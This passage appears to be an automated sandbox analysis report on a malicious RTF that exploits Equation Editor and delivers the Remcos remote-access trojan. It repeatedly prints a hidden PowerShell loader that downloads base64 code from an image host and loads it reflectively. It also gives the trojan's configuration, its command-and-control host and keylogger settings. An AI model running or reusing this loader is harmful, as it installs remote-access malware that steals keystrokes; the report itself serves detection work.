$type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", 
ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3544, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs", ProcessId: 3752, ProcessName: cmd.exe
                      Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine|base64offs
                      Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine|base64offs
                      Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 152, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , ProcessId: 3148, ProcessName: wscript.exe
                      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 152, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                      Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '
                      Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1892, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                      Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3428, TargetFilename: C:\Users\user\AppData\Local\Temp\iuqdab5m.hza.ps1

                      Data Obfuscation

                      Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine|base64offs

                      Stealing of Sensitive Information

                      Source: Registry Key setAuthor: Joe Security: Data: Details: CC C0 05 F8 36 77 FF 59 27 3F 52 CE FC 6B 29 F4 01 51 C6 7F D4 F9 81 6A A4 65 7F 05 A3 94 9F E7 97 F1 FE 17 20 A1 AD 1D 85 9E 4E 18 7D 5C 23 79 AD E1 C1 0E 06 23 D4 2A 0B 82 5C BA BD 87 A8 1F E6 3B 36 83 8F E7 02 1D C7 DD 21 B7 96 67 AA 0D B6 E4 7B EA 7A 65 6B D5 78 8A 95 65 C7 B4 90 4A 85 E2 73 85 16 4A 78 E7 49 AF 8E 2F 63 5C F9 16 16 23 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3800, TargetObject: HKEY_CURRENT_USER\Software\Rmc-999Z97\exepath
                      Timestamp                 SID      Source Port  Destination Port  Protocol  Classtype
                      05/01/24-14:55:30.813240  2018856  443          49168             TCP       A Network Trojan was detected
                      05/01/24-14:55:30.813240  2047750  443          49168             TCP       A Network Trojan was detected
                      05/01/24-14:55:31.602932  2025011  443          49168             TCP       A Network Trojan was detected
                      05/01/24-14:55:44.958525  2020424  80           49169             TCP       A Network Trojan was detected
                      05/01/24-14:55:31.605872  2049038  443          49168             TCP       A Network Trojan was detected
                      05/01/24-14:55:44.958525  2020423  80           49169             TCP       A Network Trojan was detected


                      AV Detection

                      Source: nU7Z8sPyvf.rtf | Avira: detected
                      Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
                      Source: http://geoplugin.net/json.gp/C | URL Reputation: Label: phishing
                      Source: sembe.duckdns.org | Avira URL Cloud: Label: malware
                      Source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Source: sembe.duckdns.org | Virustotal: Detection: 11%
                      Source: uploaddeimagens.com.br | Virustotal: Detection: 6%
                      Source: https://uploaddeimagens.com.br | Virustotal: Detection: 6%
                      Source: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029 | Virustotal: Detection: 14%
                      Source: nU7Z8sPyvf.rtf | ReversingLabs: Detection: 63%
                      Source: nU7Z8sPyvf.rtf | Virustotal: Detection: 56%
                      Source: Yara match | File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR
                      Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_00433837
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

                      Exploits

                      Source: Yara match | File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 107.172.31.6 Port: 80
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                      Privilege Escalation

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004074FD _wcslen,CoGetObject,15_2_004074FD
                      Source: unknown | HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: unknown | HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49166 version: TLS 1.2
                      Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.00000000040C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256n source: powershell.exe, 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.00000000040C9000.00000004.00000800.00020000.00000000.sdmp

                      Spreading

                      Source: Yara match | File source: C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs, type: DROPPED
                      Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\indexphppagenotfound[1].gif, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409253
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C291
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C34D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409665
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0044E879 FindFirstFileExA,15_2_0044E879
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_0040880C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040783C FindFirstFileW,FindNextFileW,15_2_0040783C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419AF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD37
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00407C97
                      Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user
                      Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData
                      Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini

                      Software Vulnerabilities

                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C059D ExitProcess,2_2_035C059D
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C054A URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035C054A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C0578 ShellExecuteW,ExitProcess,2_2_035C0578
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C04B9 LoadLibraryW,2_2_035C04B9
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C0563 ShellExecuteW,ExitProcess,2_2_035C0563
                      Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      Source: global traffic | DNS query: name: paste.ee
                      Source: global traffic | DNS query: name: uploaddeimagens.com.br
                      Source: global traffic | DNS query: name: sembe.duckdns.org
                      Source: global traffic | DNS query: name: geoplugin.net
                      Source: global traffic | DNS query: name: geoplugin.net
                      Source: global traffic | DNS query: name: geoplugin.net
                      Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 172.67.215.45:443
                      Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 107.172.31.6:80
                      Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 178.237.33.50:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
